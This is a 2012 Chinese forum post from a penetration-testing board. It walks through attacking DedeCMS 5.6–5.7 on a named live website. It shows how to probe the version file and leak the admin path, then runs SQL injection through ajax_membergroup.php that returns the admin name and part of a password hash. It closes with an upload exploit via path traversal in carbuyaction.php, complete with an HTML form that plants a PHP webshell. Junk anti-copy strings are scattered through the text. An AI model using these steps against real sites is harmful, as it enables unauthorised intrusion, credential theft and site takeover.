中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

---

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
这站 http://www.political-security.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
5 }* U* B% U5 w! ?! Y/ vwww.political-security.com/data/mysql_error_trace.inc 爆后台
$ _) h3 u& y* f然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
然后写上语句
+ G1 y" n) t9 Q/ \8 I7 _查看管理员帐号
http://www.political-security.co ... &membergroup=@`
) f- T$ x9 \; F/ u. q
# y* h3 D: \: }/ i3 m& r5 v- @admin

2 i2 q2 m/ B; C. d" c查看管理员密码
/ @: j& r# t1 \2 I* h　http://www.political-security.co ... &membergroup=@`
0 Z: V5 q1 F+ `* |' z2 \. K
8d29b1ef9f8c5a5af429

# |& m# @4 f: D' n% Y查看管理员密码
8 y+ D* C3 Y& V8 h2 C+ w7 X
得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5

8d2
6 v. S; B7 v  g2 ~9b1ef9f8c5a5af42
& j7 D  q) m; \) N6 Z9

. F: {, K& T. [0 B. M" p) mcmd5没解出来 只好测试第二个方法
; H$ `$ e1 a3 E1 N% I: I. y3 Q

! P  ?, ]) _1 Z5 ~! ?, {②上传漏洞：

只要登陆会员中心，然后访问页面链接
/ g6 v; z! ~* ]3 D6 f# E9 O“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”

/ |- W1 ?4 d3 F& A* X2 N0 A如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

, [9 R$ \. p, X: N( c1 M于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm
! C$ O1 A2 I  w- u
- ^! X" U+ |, j: o& C! M8 ]<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
或者
1 S# Y: ?- e$ D即可上传成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2